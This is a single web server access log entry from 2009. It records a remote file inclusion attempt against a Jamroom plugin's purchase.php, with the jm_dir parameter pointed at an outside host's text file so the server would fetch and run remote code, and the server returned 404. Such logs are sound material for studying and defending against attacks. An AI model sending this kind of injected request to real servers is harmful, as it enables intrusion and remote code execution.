61.47.7.71 - - [27/Dec/2009:21:30:04 -0800] "GET /logs/access.log///include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
